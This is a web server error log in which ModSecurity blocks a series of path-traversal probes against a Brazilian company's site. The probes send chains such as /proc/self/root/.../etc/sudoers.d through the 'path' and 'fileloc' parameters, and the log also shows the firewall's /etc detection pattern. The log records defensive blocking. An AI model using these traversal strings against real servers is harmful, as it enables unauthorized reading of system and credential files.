[Fri Mar 20 09:19:40.894018 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.243.128:56140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07XF1pVZ5mVmJwsFNBaAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:42.509673 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:35452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07XjJ3M9BSuKP7CAYumAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:42.795366 2026] [:error] [pid 15826:tid 140411691570944] [client 216.73.216.191:56666] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07XuoXxyEfFpUF8f-QMgAAAUY"]
[Fri Mar 20 09:19:43.831071 2026] [:error] [pid 21219:tid 140411641214720] [client 216.73.216.191:56738] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07X_XLqtnMIWvjpaKqDwAAAow"]
[Fri Mar 20 09:19:44.917789 2026] [mime_magic:error] [pid 15826:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:56816] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:19:44.985663 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:35456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07YAF0L0L-SsrnPo54SwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:45.263529 2026] [:error] [pid 7235:tid 140411624429312] [client 216.73.216.191:56756] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07YfqxLDW4GITHUkT5rwAAAQ4"]
[Fri Mar 20 09:19:46.018891 2026] [:error] [pid 10189:tid 140411607643904] [client 216.73.216.191:56868] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07YjJ3M9BSuKP7CAYungAAAJA"]
[Fri Mar 20 09:19:46.475147 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:35464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07YjJ3M9BSuKP7CAYuogAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:47.211644 2026] [:error] [pid 11167:tid 140411741927168] [client 216.73.216.191:56958] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Y_HIg5MgXLBnicMG1wAAAcA"]
[Fri Mar 20 09:19:47.791667 2026] [:error] [pid 26799:tid 140411557287680] [client 216.73.216.191:56994] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Y9a6ubjKNq_cu4bmoAAAA1Y"]
[Fri Mar 20 09:19:47.964958 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.243.128:35472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07YwF0L0L-SsrnPo54TwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:48.471831 2026] [:error] [pid 15826:tid 140411574073088] [client 216.73.216.191:57040] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07ZOoXxyEfFpUF8f-QOgAAAVQ"]
[Fri Mar 20 09:19:49.434925 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:46142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07ZQF0L0L-SsrnPo54UwAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:49.716489 2026] [:error] [pid 9818:tid 140411616036608] [client 216.73.216.191:57112] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07ZV1pVZ5mVmJwsFNBbQAAAE8"]
[Fri Mar 20 09:19:50.759430 2026] [:error] [pid 9818:tid 140411565680384] [client 216.73.216.191:57134] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Zl1pVZ5mVmJwsFNBcgAAAFU"]
[Fri Mar 20 09:19:50.808857 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:46156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07Zrninkcc-iUj5ApuNAAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:52.210795 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:46160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07aBCii7xarUs8iHZ3ZgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:52.319809 2026] [:error] [pid 7893:tid 140411716749056] [client 216.73.216.191:57258] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07aBCii7xarUs8iHZ3ZwAAAgM"]
[Fri Mar 20 09:19:53.219058 2026] [:error] [pid 11642:tid 140411540502272] [client 216.73.216.191:57314] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07abninkcc-iUj5ApuOgAAA5g"]
[Fri Mar 20 09:19:53.513989 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:46176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07afqxLDW4GITHUkT5vgAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:54.151020 2026] [:error] [pid 7235:tid 140411658000128] [client 216.73.216.191:57382] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07avqxLDW4GITHUkT5wgAAAQo"]
[Fri Mar 20 09:19:54.899633 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:46192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07avXLqtnMIWvjpaKqHgAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:19:55.042491 2026] [:error] [pid 11167:tid 140411599251200] [client 216.73.216.191:57454] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07a_HIg5MgXLBnicMG4gAAAdE"]
[Fri Mar 20 09:19:55.547127 2026] [:error] [pid 7893:tid 140411548894976] [client 216.73.216.191:57490] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07axCii7xarUs8iHZ3dQAAAhc"]
[Fri Mar 20 09:19:56.162987 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:46200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07bNa6ubjKNq_cu4bmrAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
